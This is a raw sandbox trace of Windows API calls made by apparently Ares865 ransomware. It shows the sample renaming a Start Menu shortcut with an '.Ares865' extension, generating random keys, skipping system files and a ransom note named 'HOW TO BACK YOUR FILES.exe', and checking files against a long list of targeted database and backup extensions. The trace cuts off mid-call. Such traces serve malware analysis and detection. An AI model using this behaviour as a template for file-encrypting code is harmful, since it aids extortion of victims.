[0058.066] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.066] lstrlenW (lpString="xmlff") returned 5 [0058.066] lstrcmpiW (lpString1=").lnk", lpString2="xmlff") returned -1 [0058.066] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.Ares865") returned 80 [0058.066] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\internet explorer (64-bit).lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\internet explorer (64-bit).lnk.ares865"), dwFlags=0x1) returned 1 [0058.067] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\internet explorer (64-bit).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.067] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1415) returned 1 [0058.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0058.067] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0058.068] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.068] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.068] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x890, lpName=0x0) returned 0x154 [0058.070] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x890) returned 0x190000 [0058.070] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0058.071] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.071] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0058.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0058.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.072] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.072] CloseHandle (hObject=0x154) returned 1 [0058.072] CloseHandle (hObject=0x15c) returned 1 [0058.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0058.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.074] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6392a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="aoldtz.exe") returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".") returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="..") returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="windows") returned -1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootmgr") returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="temp") returned -1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="pagefile.sys") returned -1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot") returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ids.txt") returned 1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="perflogs") returned -1 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="MSBuild") returned -1 [0058.074] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0058.074] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk") returned 72 [0058.074] lstrcpyW (in: lpString1=0x2cce454, lpString2="Internet Explorer.lnk" | out: lpString1="Internet Explorer.lnk") returned="Internet Explorer.lnk" [0058.074] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0058.074] lstrlenW (lpString="Ares865") returned 7 [0058.074] lstrcmpiW (lpString1="rer.lnk", lpString2="Ares865") returned 1 [0058.074] lstrlenW (lpString=".dll") returned 4 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".dll") returned 1 [0058.074] lstrlenW (lpString=".lnk") returned 4 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".lnk") returned 1 [0058.074] lstrlenW (lpString=".ini") returned 4 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".ini") returned 1 [0058.074] lstrlenW (lpString=".sys") returned 4 [0058.074] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".sys") returned 1 [0058.074] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0058.074] lstrlenW (lpString="bak") returned 3 [0058.074] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.074] lstrlenW (lpString="ba_") returned 3 [0058.074] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.074] lstrlenW (lpString="dbb") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.075] lstrlenW (lpString="vmdk") returned 4 [0058.075] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.075] lstrlenW (lpString="rar") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.075] lstrlenW (lpString="zip") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.075] lstrlenW (lpString="tgz") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.075] lstrlenW (lpString="vbox") returned 4 [0058.075] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.075] lstrlenW (lpString="vdi") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.075] lstrlenW (lpString="vhd") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.075] lstrlenW (lpString="vhdx") returned 4 [0058.075] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.075] lstrlenW (lpString="avhd") returned 4 [0058.075] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.075] lstrlenW (lpString="db") returned 2 [0058.075] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.075] lstrlenW (lpString="db2") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.075] lstrlenW (lpString="db3") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.075] lstrlenW (lpString="dbf") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.075] lstrlenW (lpString="mdf") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.075] lstrlenW (lpString="mdb") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.075] lstrlenW (lpString="sql") returned 3 [0058.075] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.075] lstrlenW (lpString="sqlite") returned 6 [0058.075] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0058.075] lstrlenW (lpString="sqlite3") returned 7 [0058.075] lstrcmpiW (lpString1="rer.lnk", lpString2="sqlite3") returned -1 [0058.075] lstrlenW (lpString="sqlitedb") returned 8 [0058.076] lstrcmpiW (lpString1="orer.lnk", lpString2="sqlitedb") returned -1 [0058.076] lstrlenW (lpString="xml") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.076] lstrlenW (lpString="$er") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.076] lstrlenW (lpString="4dd") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.076] lstrlenW (lpString="4dl") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.076] lstrlenW (lpString="^^^") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.076] lstrlenW (lpString="abs") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.076] lstrlenW (lpString="abx") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.076] lstrlenW (lpString="accdb") returned 5 [0058.076] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0058.076] lstrlenW (lpString="accdc") returned 5 [0058.076] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0058.076] lstrlenW (lpString="accde") returned 5 [0058.076] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0058.076] lstrlenW (lpString="accdr") returned 5 [0058.076] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0058.076] lstrlenW (lpString="accdt") returned 5 [0058.076] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0058.076] lstrlenW (lpString="accdw") returned 5 [0058.076] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0058.076] lstrlenW (lpString="accft") returned 5 [0058.076] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0058.076] lstrlenW (lpString="adb") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.076] lstrlenW (lpString="adb") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.076] lstrlenW (lpString="ade") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.076] lstrlenW (lpString="adf") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.076] lstrlenW (lpString="adn") returned 3 [0058.076] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.077] lstrlenW (lpString="adp") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.077] lstrlenW (lpString="alf") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.077] lstrlenW (lpString="ask") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.077] lstrlenW (lpString="btr") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.077] lstrlenW (lpString="cat") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.077] lstrlenW (lpString="cdb") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.077] lstrlenW (lpString="ckp") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.077] lstrlenW (lpString="cma") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.077] lstrlenW (lpString="cpd") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.077] lstrlenW (lpString="dacpac") returned 6 [0058.077] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0058.077] lstrlenW (lpString="dad") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.077] lstrlenW (lpString="dadiagrams") returned 10 [0058.077] lstrcmpiW (lpString1="plorer.lnk", lpString2="dadiagrams") returned 1 [0058.077] lstrlenW (lpString="daschema") returned 8 [0058.077] lstrcmpiW (lpString1="orer.lnk", lpString2="daschema") returned 1 [0058.077] lstrlenW (lpString="db-journal") returned 10 [0058.077] lstrcmpiW (lpString1="plorer.lnk", lpString2="db-journal") returned 1 [0058.077] lstrlenW (lpString="db-shm") returned 6 [0058.077] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0058.077] lstrlenW (lpString="db-wal") returned 6 [0058.077] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0058.077] lstrlenW (lpString="dbc") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.077] lstrlenW (lpString="dbs") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.077] lstrlenW (lpString="dbt") returned 3 [0058.077] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.078] lstrlenW (lpString="dbv") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.078] lstrlenW (lpString="dbx") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.078] lstrlenW (lpString="dcb") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.078] lstrlenW (lpString="dct") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.078] lstrlenW (lpString="dcx") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.078] lstrlenW (lpString="ddl") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.078] lstrlenW (lpString="dlis") returned 4 [0058.078] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.078] lstrlenW (lpString="dp1") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.078] lstrlenW (lpString="dqy") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.078] lstrlenW (lpString="dsk") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.078] lstrlenW (lpString="dsn") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.078] lstrlenW (lpString="dtsx") returned 4 [0058.078] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.078] lstrlenW (lpString="dxl") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.078] lstrlenW (lpString="eco") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.078] lstrlenW (lpString="ecx") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.078] lstrlenW (lpString="edb") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.078] lstrlenW (lpString="epim") returned 4 [0058.078] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.078] lstrlenW (lpString="fcd") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.078] lstrlenW (lpString="fdb") returned 3 [0058.078] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.079] lstrlenW (lpString="fic") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.079] lstrlenW (lpString="flexolibrary") returned 12 [0058.079] lstrcmpiW (lpString1="Explorer.lnk", lpString2="flexolibrary") returned -1 [0058.079] lstrlenW (lpString="fm5") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.079] lstrlenW (lpString="fmp") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.079] lstrlenW (lpString="fmp12") returned 5 [0058.079] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0058.079] lstrlenW (lpString="fmpsl") returned 5 [0058.079] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0058.079] lstrlenW (lpString="fol") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.079] lstrlenW (lpString="fp3") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.079] lstrlenW (lpString="fp4") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.079] lstrlenW (lpString="fp5") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.079] lstrlenW (lpString="fp7") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.079] lstrlenW (lpString="fpt") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.079] lstrlenW (lpString="frm") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.079] lstrlenW (lpString="gdb") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.079] lstrlenW (lpString="gdb") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.079] lstrlenW (lpString="grdb") returned 4 [0058.079] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.079] lstrlenW (lpString="gwi") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.079] lstrlenW (lpString="hdb") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.079] lstrlenW (lpString="his") returned 3 [0058.079] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.080] lstrlenW (lpString="ib") returned 2 [0058.080] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.080] lstrlenW (lpString="idb") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.080] lstrlenW (lpString="ihx") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.080] lstrlenW (lpString="itdb") returned 4 [0058.080] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.080] lstrlenW (lpString="itw") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.080] lstrlenW (lpString="jet") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.080] lstrlenW (lpString="jtx") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.080] lstrlenW (lpString="kdb") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.080] lstrlenW (lpString="kexi") returned 4 [0058.080] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.080] lstrlenW (lpString="kexic") returned 5 [0058.080] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0058.080] lstrlenW (lpString="kexis") returned 5 [0058.080] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0058.080] lstrlenW (lpString="lgc") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.080] lstrlenW (lpString="lwx") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.080] lstrlenW (lpString="maf") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.080] lstrlenW (lpString="maq") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.080] lstrlenW (lpString="mar") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.080] lstrlenW (lpString="marshal") returned 7 [0058.080] lstrcmpiW (lpString1="rer.lnk", lpString2="marshal") returned 1 [0058.080] lstrlenW (lpString="mas") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.080] lstrlenW (lpString="mav") returned 3 [0058.080] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.081] lstrlenW (lpString="maw") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.081] lstrlenW (lpString="mdbhtml") returned 7 [0058.081] lstrcmpiW (lpString1="rer.lnk", lpString2="mdbhtml") returned 1 [0058.081] lstrlenW (lpString="mdn") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.081] lstrlenW (lpString="mdt") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.081] lstrlenW (lpString="mfd") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.081] lstrlenW (lpString="mpd") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.081] lstrlenW (lpString="mrg") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.081] lstrlenW (lpString="mud") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.081] lstrlenW (lpString="mwb") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.081] lstrlenW (lpString="myd") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.081] lstrlenW (lpString="ndf") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.081] lstrlenW (lpString="nnt") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.081] lstrlenW (lpString="nrmlib") returned 6 [0058.081] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0058.081] lstrlenW (lpString="ns2") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.081] lstrlenW (lpString="ns3") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.081] lstrlenW (lpString="ns4") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.081] lstrlenW (lpString="nsf") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.081] lstrlenW (lpString="nv") returned 2 [0058.081] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.081] lstrlenW (lpString="nv2") returned 3 [0058.081] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.082] lstrlenW (lpString="nwdb") returned 4 [0058.082] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.082] lstrlenW (lpString="nyf") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.082] lstrlenW (lpString="odb") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.082] lstrlenW (lpString="odb") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.082] lstrlenW (lpString="oqy") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.082] lstrlenW (lpString="ora") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.082] lstrlenW (lpString="orx") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.082] lstrlenW (lpString="owc") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.082] lstrlenW (lpString="p96") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.082] lstrlenW (lpString="p97") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.082] lstrlenW (lpString="pan") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.082] lstrlenW (lpString="pdb") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.082] lstrlenW (lpString="pdm") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.082] lstrlenW (lpString="pnz") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.082] lstrlenW (lpString="qry") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.082] lstrlenW (lpString="qvd") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.082] lstrlenW (lpString="rbf") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.082] lstrlenW (lpString="rctd") returned 4 [0058.082] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.082] lstrlenW (lpString="rod") returned 3 [0058.082] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.083] lstrlenW (lpString="rodx") returned 4 [0058.083] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.083] lstrlenW (lpString="rpd") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.083] lstrlenW (lpString="rsd") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.083] lstrlenW (lpString="sas7bdat") returned 8 [0058.083] lstrcmpiW (lpString1="orer.lnk", lpString2="sas7bdat") returned -1 [0058.083] lstrlenW (lpString="sbf") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.083] lstrlenW (lpString="scx") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.083] lstrlenW (lpString="sdb") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.083] lstrlenW (lpString="sdc") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.083] lstrlenW (lpString="sdf") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.083] lstrlenW (lpString="sis") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.083] lstrlenW (lpString="spq") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.083] lstrlenW (lpString="te") returned 2 [0058.083] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.083] lstrlenW (lpString="teacher") returned 7 [0058.083] lstrcmpiW (lpString1="rer.lnk", lpString2="teacher") returned -1 [0058.083] lstrlenW (lpString="tmd") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.083] lstrlenW (lpString="tps") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.083] lstrlenW (lpString="trc") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.083] lstrlenW (lpString="trc") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", 